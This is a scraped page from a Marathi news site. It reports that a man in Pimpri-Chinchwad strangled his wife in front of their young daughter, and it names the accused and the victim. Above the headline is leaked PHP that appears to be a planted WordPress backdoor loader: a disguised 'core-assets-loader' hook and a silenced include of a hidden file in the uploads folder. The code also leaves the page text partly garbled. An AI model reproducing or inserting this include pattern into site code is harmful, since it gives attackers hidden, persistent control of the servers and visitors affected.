add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ३ वर्षीय चिमुकलीच्या डोळ्यादेखत उच्चशिक्षित तरुणानं पत्नीला संपवलं; पुण्यातील थरारक घटना – SOCH INDIA
Menu

३ वर्षीय चिमुकलीच्या डोळ्यादेखत उच्चशिक्षित तरुणानं पत्नीला संपवलं; पुण्यातील थरारक घटना

nobanner

पिंपरी-चिंचवडमध्ये उच्चशिक्षित तरुणाने पत्नीचा गळा आवळून खून केल्याची धक्कादायक घटना समोर आली आहे. याप्रकरणी शिवम पंकज पचौरी उर्फ भारद्वाज (वय- ३२) याला हिंजवडी पोलिसांनी बेड्या ठोकल्या आहेत. अवंतीका शर्मा (वय- ३०) असं खून झालेल्या महिलेचं नाव आहे. आरोपी शिवम हा दररोज मद्यपान करून पत्नीला मारहाण करायचा यातूनच टोकाचं पाऊल उचलत पत्नीचा खून केल्याचं पोलिसांनी सांगितलं आहे. आरोपी शिवम याने नुकतीच आयटी कंपनीतील नोकरी सोडली होती.

पोलिसांनी दिलेल्या माहितीनुसार, आरोपी शिवम हा उच्चशिक्षित असून त्याने अलीकडेच आयटी कंपनीतील नोकरी सोडली होती. तो सध्या बेरोजगार होता. तो दररोज मद्यपान करून पत्नीला मारहाण करायचा, अशी माहिती पोलिसांनी दिली. पती पत्नीमध्ये किरकोळ कारणावरून वादही व्हायचे. दोघांना तीन वर्षांची मुलगी आहे.